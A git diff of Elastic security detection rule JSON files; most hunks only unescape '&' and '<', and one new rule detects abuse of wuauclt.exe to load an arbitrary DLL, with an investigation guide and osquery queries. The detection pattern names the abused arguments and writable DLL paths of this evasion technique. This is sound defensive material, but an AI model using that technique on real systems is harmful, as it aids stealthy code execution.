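`"?:\\Windows\\security\\*.exe"` twice; dropping the duplicate makes the list easier to audit. The `/* uncomment once in winlogbeat */` comment should name the missing field (`process.code_signature.*`) so the deferred check is actually revisited when that data source gains it.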
diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json
index 1dbff8f0777..8c4ccc3e550 100644
--- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json
@@ -87,7 +87,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json
index 79f2f413122..ccfc060f3ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json b/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json
index e2abb92c0c1..c5b5c3f1780 100644
--- a/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json index 3934fe8329d..f265f3264ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json index 73097327e81..1357e398150 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json index fd91c3b05d1..5666970982b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json index a6134771374..b557f43c475 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json index 3311afe2269..367c87b29b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json index 1fa05448b63..620040602a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json index 50de1df0bf6..3b2bfeded3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json index de61db634ca..2b051cffc4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json index f94459397fc..648ae8ce3e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json index f2561305927..e28e097c019 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json index 86be9b28d08..f23f95d4434 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json index 459f4dac54b..54957b37258 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json index 2ca451ca3c2..c5a0a35a847 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json index 9d8a33048dc..a3f81415118 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json index cd0117f3392..0aba2a59125 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json index 9f15198174d..2851fcf6f78 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json index 30ba3d0baf4..be98a594dda 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json index 7d51b04c8c9..6fdbe5d1470 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json index 3c3158ffe31..5c05ab4beb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json 
+++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json index 66c7d3b6340..c55b20e8c0c 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json index d328d601105..9df8e7245bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json new file mode 100644 index 00000000000..0f1eaf0b856 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ImageLoad via Windows Update Auto Update Client", + "note": "## Triage and analysis\n\n### Investigating ImageLoad via Windows Update Auto Update Client\n\nThe Windows Update Auto Update Client (wuauclt.exe) is the component responsible for managing system updates. However, adversaries may abuse this process to load a malicious DLL and execute malicious code while blending into a legitimate system mechanism. \n\nThis rule identifies potential abuse for code execution by monitoring for specific process arguments (\"/RunHandlerComServer\" and \"/UpdateDeploymentProvider\") and common writable paths where the target DLL can be placed (e.g., \"C:\\Users\\*.dll\", \"C:\\ProgramData\\*.dll\", etc.).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line and identify the DLL location.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", + "references": [ + "https://dtm.uk/wuauclt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details 
